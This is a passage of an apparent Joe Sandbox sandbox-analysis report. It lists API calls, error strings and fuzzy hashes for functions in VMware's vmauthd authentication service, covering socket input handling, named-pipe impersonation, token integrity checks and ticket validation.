                                                    • VMAuthdSocketRead, xrefs: 00ED38DD, 00ED3972
                                                    • Short response (%d). Disconnecting., xrefs: 00ED3831
                                                    • UTF-8, xrefs: 00ED3899
                                                    • Line missing \r, xrefs: 00ED3872
                                                    • Line is not in UTF-8. Disconnecting, xrefs: 00ED38B0
                                                    • recv timed-out waiting for data on connection. aborting., xrefs: 00ED37FB
                                                    • Input not in UTF-8 encoding., xrefs: 00ED38C9
                                                    • Overflowed buffer, xrefs: 00ED37E7
                                                    • Buffer full. Disconnecting., xrefs: 00ED37D8
                                                    • %s(): reading from closed socket., xrefs: 00ED3977
                                                    • Read a \n without a corresponding \r. Disconnecting., xrefs: 00ED385F
                                                    • recv() FAIL: %d., xrefs: 00ED3810
                                                    • %s: read failed. Closing socket for reading., xrefs: 00ED38E2
                                                    • Input too large., xrefs: 00ED37F1
                                                    • Input incorrectly terminated., xrefs: 00ED3840
                                                    • Input incorrectly terminated., xrefs: 00ED387C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CloseHandleObjectSingleWait_printffree
                                                    • String ID: %s(): reading from closed socket.$%s: read failed. Closing socket for reading.$Buffer full. Disconnecting.$Data not in UTF-8 format$Input incorrectly terminated.$Input incorrectly terminated.$Input not in UTF-8 encoding.$Input too large.$Line is not in UTF-8. Disconnecting$Line missing \r$Overflowed buffer$Read a \n without a corresponding \r. Disconnecting.$Short response (%d). Disconnecting.$UTF-8$VMAuthdSocketRead$recv timed-out waiting for data on connection. aborting.$recv() FAIL: %d.
                                                    • API String ID: 974896413-2831141954
                                                    • Opcode ID: fe1bb71848d3b0042995f73844586e5da9a1cad8413528f96198b9123856bb8a
                                                    • Instruction ID: f9d47f0633cd03f04320d310aae24c7a3d1e912215b92cc80ddfab7eb704d11b
                                                    • Opcode Fuzzy Hash: fe1bb71848d3b0042995f73844586e5da9a1cad8413528f96198b9123856bb8a
                                                    • Instruction Fuzzy Hash: 6B615A74A00304AADB24AB749C02BAAB7A1DF10714F00215FF565B63C2E7B15B0797A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED3C70 Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 97threadpipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ImpersonateNamedPipeClient.ADVAPI32(?), ref: 00ED3C9F
                                                    • GetLastError.KERNEL32 ref: 00ED3CA9
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED3CB0
                                                    • Warning.VMWAREBASE(?,?,ImpersonateNamePipeClient failed: %s (%d) ,00000000,00000000), ref: 00ED3CBF
                                                    • memset.VCRUNTIME140(?,00000000,00000400), ref: 00ED3CDA
                                                    • Warning.VMWAREBASE(?,?,?,00000000,00000400), ref: 00ED3CF7
                                                    • GetLastError.KERNEL32 ref: 00ED3D03
                                                    • Warning.VMWAREBASE(Failed to obtain username: %d,00000000), ref: 00ED3D0F
                                                    • GetCurrentThread.KERNEL32 ref: 00ED3D38
                                                    • OpenThreadToken.ADVAPI32(00000000), ref: 00ED3D3F
                                                    • GetLastError.KERNEL32 ref: 00ED3D49
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED3D50
                                                    • Warning.VMWAREBASE(?,?,DuplicateTokenEx failed: %s (%d) ,00000000,00000000), ref: 00ED3D95
                                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00ED3DAF
                                                    Strings
                                                    • ImpersonateNamePipeClient failed: %s (%d) , xrefs: 00ED3CB6
                                                    • Username associated with named pipe: %s, xrefs: 00ED3D1D
                                                    • DuplicateTokenEx failed: %s (%d) , xrefs: 00ED3D8C
                                                    • OpenThreadToken failed: %s (%d) , xrefs: 00ED3D56
                                                    • Failed to obtain username: %d, xrefs: 00ED3D0A
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$Thread$ClientCloseCurrentHandleImpersonateNamedOpenPipeTokenmemset
                                                    • String ID: DuplicateTokenEx failed: %s (%d) $Failed to obtain username: %d$ImpersonateNamePipeClient failed: %s (%d) $OpenThreadToken failed: %s (%d) $Username associated with named pipe: %s
                                                    • API String ID: 3019834010-2777213736
                                                    • Opcode ID: 1b105f05341b526ffe18d6e9d4a98411b3a838c2b0609edc4384f4a9febeb2c0
                                                    • Instruction ID: 92d5cc78b987f3ea2681c838c1c26f2fe090e2b8a1403358c18f9bdc4a8d06cd
                                                    • Opcode Fuzzy Hash: 1b105f05341b526ffe18d6e9d4a98411b3a838c2b0609edc4384f4a9febeb2c0
                                                    • Instruction Fuzzy Hash: 0D3186F1501208AFDB20AB70AD4AFAA73ADEF04304F0455A7B714F2291D7709B468F66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1440 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 243COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,InSeCuRe), ref: 00ED1499
                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 00ED14B5
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$memset
                                                    • String ID: InSeCuRe$LOGIN FAILURE from %.128s, %s$Login incorrect.$Login with USER first.$No ticket found$Password not understood.$Ticket does not specify a cfgFile$Ticket does not specify a socketName$Ticket found: cfg=%s socket=%s$User %s logged in.$VUUU
                                                    • API String ID: 3890564892-1759344295
                                                    • Opcode ID: 1bf1c17757d6859354b42bf765ecc6633067ef53e8f08170db0489e0e923b99b
                                                    • Instruction ID: 203d055018b0557eadfa20942ee44929aa9fe56ccc26ad56be5d4039228fc0f3
                                                    • Opcode Fuzzy Hash: 1bf1c17757d6859354b42bf765ecc6633067ef53e8f08170db0489e0e923b99b
                                                    • Instruction Fuzzy Hash: 3D812A71A00205ABCB20DF64EC42BAA77E5DB45304F0451F7ED0AFB382EA358A4AC791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED4080 Relevance: 36.2, APIs: 24, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?,00000000,?), ref: 00ED40B9
                                                    • Warning.VMWAREBASE(00000001,?), ref: 00ED40C4
                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00ED40DA
                                                    • IsValidSid.ADVAPI32(00000000), ref: 00ED40F1
                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00ED4108
                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00ED411F
                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00ED413B
                                                    • Warning.VMWAREBASE(00000001,?), ref: 00ED4146
                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00ED415D
                                                    • IsValidSid.ADVAPI32(00000000), ref: 00ED4171
                                                    • EqualSid.ADVAPI32(?,?), ref: 00ED4185
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED4194
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED419D
                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00ED41B4
                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00ED41CB
                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00ED41E9
                                                    • Warning.VMWAREBASE(00000001,00000000), ref: 00ED41F4
                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00ED420B
                                                    • IsValidSid.ADVAPI32(00000000), ref: 00ED421B
                                                    • EqualSid.ADVAPI32(?,?), ref: 00ED422B
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED423F
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED4250
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED4257
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED425E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Token$Information$CloseHandleOpenProcess$ValidWarning$Equalfree
                                                    • String ID:
                                                    • API String ID: 802510982-0
                                                    • Opcode ID: 55405b6cca281aff1248c56213d60feb079af7238b63d0131deb2fae94a49554
                                                    • Instruction ID: 2c12c7346d4c1e98334d39b2f89890551f1cbca3ed5e0777901a615f20c0fd1f
                                                    • Opcode Fuzzy Hash: 55405b6cca281aff1248c56213d60feb079af7238b63d0131deb2fae94a49554
                                                    • Instruction Fuzzy Hash: DC514E71A01209BFDB119FA1EC49FDE7BB9EF15701F084066FA00F22A0D7719A49DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1A20 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 272COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(received %s command: %s,?,?), ref: 00ED1A5E
                                                    • Warning.VMWAREBASE(?,?,00EDA6D8), ref: 00ED1A7A
                                                    • Warning.VMWAREBASE(00000000,?), ref: 00ED1A93
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 00ED1AD1
                                                    • Warning.VMWAREBASE(00000025,?,?,00000000), ref: 00ED1B10
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1B30
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000), ref: 00ED1B78
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1C58
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1C6D
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1C95
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1C9C
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1CAB
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1CC1
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1CD6
                                                    Strings
                                                    • Invalid arguments to '%s%s', xrefs: 00ED1C7C
                                                    • Command '%s' not authorized to access the specific VM socket, xrefs: 00ED1C13
                                                    • bora\apps\vmauthd\vmauthd.c, xrefs: 00ED1D02
                                                    • received %s command: %s, xrefs: 00ED1A3E
                                                    • MEM_ALLOC %s:%d, xrefs: 00ED1D07
                                                    • Command '%s' not authorized for specified VM, xrefs: 00ED1BBC
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: free$Warning$calloc
                                                    • String ID: Command '%s' not authorized for specified VM$Command '%s' not authorized to access the specific VM socket$Invalid arguments to '%s%s'$MEM_ALLOC %s:%d$bora\apps\vmauthd\vmauthd.c$received %s command: %s
                                                    • API String ID: 153094251-2774384987
                                                    • Opcode ID: 512c4a9f5e4a7af5ee3a92f6e71452ba937b91b69439aa8b158d5b06e5b82611
                                                    • Instruction ID: 9385491c047609256c62b3f66c9bf8bfc563c5dbadf1459c0c68a8f1acc6262f
                                                    • Opcode Fuzzy Hash: 512c4a9f5e4a7af5ee3a92f6e71452ba937b91b69439aa8b158d5b06e5b82611
                                                    • Instruction Fuzzy Hash: 1C918371A00215ABDF149FA4DD85BFEBBB5EF05304F0810ABE905B7342D7369A16CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED7ED0 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 234COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00ED81C0: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00ED81DE
                                                      • Part of subcall function 00ED81C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00ED820D
                                                    • Warning.VMWAREBASE([Ticket] Ticket is too short. Actual %Iu, expected at least %d,?,00000010,?,00000000), ref: 00ED7F39
                                                    • Warning.VMWAREBASE([Ticket] Ticket too long.,?,00000000), ref: 00ED7F64
                                                    • Warning.VMWAREBASE(?,?,?,00000000), ref: 00ED7FC1
                                                    • Warning.VMWAREBASE(?,00000000,00000001,00000000,?,?,?,00000000), ref: 00ED7FD2
                                                    • Warning.VMWAREBASE([Ticket] Ticket not found: %s,00000000,?,?,?,?,?,?,?,00000000), ref: 00ED7FE4
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,[Ticket] Ticket not found: %s,00000000,?,?,?,?,?,?,?,00000000), ref: 00ED7FEA
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00ED8014
                                                    • Warning.VMWAREBASE(?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED803B
                                                    • Warning.VMWAREBASE([Ticket] Invalid ticket.,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED815A
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED8169
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$_time64
                                                    • String ID: VERIFY %s:%d$[Ticket] Invalid ticket - too long.$[Ticket] Invalid ticket.$[Ticket] Ticket is too short. Actual %Iu, expected at least %d$[Ticket] Ticket not found: %s$[Ticket] Ticket too long.$bora\lib\ticket\ticket.c$config file name$service name
                                                    • API String ID: 1808753558-2483994901
                                                    • Opcode ID: 5724413f7329f52f73b58e0a8d5279b5c2489f8ad6dd602e3e5d91c21e1f43c0
                                                    • Instruction ID: 11fd8bf64aa3c884f6803388c9d94ed21af91f09478fb5c2b932e5ad686ebbaa
                                                    • Opcode Fuzzy Hash: 5724413f7329f52f73b58e0a8d5279b5c2489f8ad6dd602e3e5d91c21e1f43c0
                                                    • Instruction Fuzzy Hash: DD714B719041185BDF20AF248E42BEEB7B5DB05314F4421D7E999B7382DA31DE4BCBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED76E0 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(00EE1098,?,?,00000000), ref: 00ED7745
                                                    • LeaveCriticalSection.KERNEL32(00EE1098), ref: 00ED7778
                                                    • Warning.VMWAREBASE(?,00000000,?,?,?,00000000), ref: 00ED77E0
                                                    • Warning.VMWAREBASE(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00ED7801
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00ED7810
                                                    • Warning.VMWAREBASE(Access denied opening securable object %s.,?,?,?,?,?,?,?,00000000), ref: 00ED7823
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,00000000), ref: 00ED7840
                                                    • Warning.VMWAREBASE(Failed to open securable object. Error %d opening "%s": %s,00000000,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00ED784D
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000000), ref: 00ED7869
                                                    • DuplicateHandle.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000002,?,?,?,?,?,?,00000000), ref: 00ED787F
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00ED7889
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,00000000), ref: 00ED7892
                                                    • Warning.VMWAREBASE(Failed to duplicate handle: %d "%s": %s,00000000,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00ED789F
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00ED78AF
                                                    Strings
                                                    • Failed to open securable object. Error %d opening "%s": %s, xrefs: 00ED7848
                                                    • Request by process %d to open '%s': unrecognized pid, xrefs: 00ED7790
                                                    • Failed to duplicate handle: %d "%s": %s, xrefs: 00ED789A
                                                    • Access denied opening securable object %s., xrefs: 00ED781E
                                                    • Request by process %d to open '%s': invalid session info, xrefs: 00ED78CD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CriticalErrorHandleLastSection$CloseCurrentDuplicateEnterLeaveProcess
                                                    • String ID: Access denied opening securable object %s.$Failed to duplicate handle: %d "%s": %s$Failed to open securable object. Error %d opening "%s": %s$Request by process %d to open '%s': invalid session info$Request by process %d to open '%s': unrecognized pid
                                                    • API String ID: 3997251235-2006052915
                                                    • Opcode ID: e5da4ec70e8b5633c267d5e5706a1546c4263163eb69ad8547c949758ff9228a
                                                    • Instruction ID: f10baaccc1c523aca7afd5ff56d568969cf572fe9a6bb9b6698964d3908875f6
                                                    • Opcode Fuzzy Hash: e5da4ec70e8b5633c267d5e5706a1546c4263163eb69ad8547c949758ff9228a
                                                    • Instruction Fuzzy Hash: 56510475A04209AFCB10DFA8DC45AEEB7B6EF48324F14166BF959B3381E7305942C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED6BE0 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 181COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000008,?,00000000,00000000), ref: 00ED6C0D
                                                    • GetCurrentProcess.KERNEL32 ref: 00ED6C20
                                                    • GetCurrentProcess.KERNEL32 ref: 00ED6C28
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000002), ref: 00ED6C3D
                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 00ED6C9C
                                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED6CD1
                                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED6CFC
                                                    • Warning.VMWAREBASE(Unable to grow map to %d elements,00000000), ref: 00ED6D47
                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00ED6D8E
                                                    • GetLastError.KERNEL32 ref: 00ED6DAE
                                                    • Warning.VMWAREBASE ref: 00ED6DB6
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED6DDA
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED6DEB
                                                    Strings
                                                    • Unable to grow map to %d elements, xrefs: 00ED6D42
                                                    • ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d), xrefs: 00ED6DBD
                                                    • bora\apps\vmauthd\authdServiceDesktop.cpp, xrefs: 00ED6E07
                                                    • NOT_IMPLEMENTED %s:%d, xrefs: 00ED6E0C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalCurrentHandleProcessSectionWarningrealloc$CloseDuplicateEnterErrorLastLeavecallocfree
                                                    • String ID: NOT_IMPLEMENTED %s:%d$ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d)$Unable to grow map to %d elements$bora\apps\vmauthd\authdServiceDesktop.cpp
                                                    • API String ID: 793435597-2097563929
                                                    • Opcode ID: 73ec2dda6691fdb6b4f0d07abbb292fe09ee511a7cebbf1275f66b891996b844
                                                    • Instruction ID: 0ca45fde5aadaa0f980d169ee8bddc262d4971332491a171936092d3b467e4c7
                                                    • Opcode Fuzzy Hash: 73ec2dda6691fdb6b4f0d07abbb292fe09ee511a7cebbf1275f66b891996b844
                                                    • Instruction Fuzzy Hash: 7051F278A01289AFCB14EF65EC95A7E77B6EB05354F04056AF901FB3A0DB30C989CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED62D0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED62E9
                                                    • Warning.VMWAREBASE(00000010,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED62F5
                                                    • Warning.VMWAREBASE(?,00000010,?,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED630F
                                                    • Warning.VMWAREBASE(00000018,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9), ref: 00ED6331
                                                    • Warning.VMWAREBASE(?,00000018,?,?,?,?,?,?,00000000), ref: 00ED6339
                                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00000018,?,?,?,?,?,?,00000000), ref: 00ED6349
                                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED637D
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED63FF
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED6408
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED640F
                                                    • InitializeCriticalSection.KERNEL32(?,00000000,NOT_IMPLEMENTED %s:%d,bora\apps\vmauthd\localConnectToken.cpp,00000105,NOT_IMPLEMENTED %s:%d,bora\apps\vmauthd\localConnectToken.cpp,00000102,?,?,00000000), ref: 00ED6484
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED648E
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,?,00000004,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED649B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$_time64calloc$CloseCriticalHandleInitializeSection
                                                    • String ID: Expiring local connect token!$NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\localConnectToken.cpp
                                                    • API String ID: 1245594273-4287543833
                                                    • Opcode ID: 63d62d2bf160ea885ba62063a6d9cc1f33adf31e6635db80e7ad8c8c0bf20e97
                                                    • Instruction ID: fd7da86770413ae1cfa004f64490fca83296dfe4e0d838e77a36647dafe4b3d1
                                                    • Opcode Fuzzy Hash: 63d62d2bf160ea885ba62063a6d9cc1f33adf31e6635db80e7ad8c8c0bf20e97
                                                    • Instruction Fuzzy Hash: 9451BD70A012059FCB209F69ED41A9ABBF4FF48304F14502BFA55FB361D771AA4ACB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED7AE0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,?,00000000,?,?,00000000), ref: 00ED7B16
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,00000000), ref: 00ED7B48
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,00000000), ref: 00ED7B5C
                                                    • Warning.VMWAREBASE([Ticket] Cannot read %s: %s.,00ED810A,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00ED7B68
                                                    • memchr.VCRUNTIME140(?,0000000A,?,?,?,?,?,?,?,?,00000000), ref: 00ED7B99
                                                    • Warning.VMWAREBASE([Ticket] Cannot seek to the beginning of %s.,00ED810A,?,?,?,00000000), ref: 00ED7CAE
                                                    Strings
                                                    • [Ticket] Cannot read %s: %s., xrefs: 00ED7B63
                                                    • [Ticket] Cannot read %s: ticket on disk is truncated., xrefs: 00ED7BF5
                                                    • [Ticket] Cannot find end of %s: %s., xrefs: 00ED7C66
                                                    • [Ticket] Cannot find end of %s: ticket on disk is truncated., xrefs: 00ED7C57
                                                    • [Ticket] Cannot seek to the beginning of %s., xrefs: 00ED7CA9
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
